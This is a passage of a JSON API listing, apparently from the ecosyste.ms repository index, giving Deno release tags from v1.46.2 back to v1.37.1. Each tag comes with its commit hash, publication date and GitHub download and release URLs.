te.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2